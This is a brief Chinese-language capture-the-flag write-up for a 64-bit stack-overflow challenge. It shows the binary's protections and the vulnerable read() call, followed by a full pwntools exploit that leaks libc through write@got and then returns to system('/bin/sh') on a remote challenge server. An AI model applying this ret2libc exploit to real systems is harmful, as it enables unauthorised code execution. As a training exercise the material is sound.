Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
64位,只开了nx
ssize_t vulnerable_function()
{
char buf[128]; // [rsp+0h] [rbp-80h] BYREF
write(1, "Input:\n", 7uLL);
return read(0, buf, 0x200uLL);
}
溢出打libc,将平常的puts@got泄露改成write@got,puts只需要一个参数所以平时都是直接rdi,puts@got
write需要三个参数,本题是64位也就是rdi
,rsi
,rdx
三个参数
三个参数都可以ROPgadget出来,因为没有rdx的gadget,但是实际上rdx的数也大于8,所以不需要也可
from pwn import*
from Yapack import *
libc=ELF('libc-2.23.so')
r,elf=rec("node4.buuoj.cn",29247,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
#debug('b *0x400613')
rdi=0x00000000004006b3
rsi_r15=0x00000000004006b1
pl=cyclic(0x88)
pl+=p64(rdi)+p64(1)+p64(rsi_r15)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])+p64(0x40061A)
sla('Input:',pl)
leak=get_addr_u64()-libc.sym['write']
li(leak)
sys=system(leak)
sh=shell(leak)
pl=cyclic(0x88)+p64(rdi)+p64(sh)+p64(sys)
sla('Input',pl)
#debug()
ia()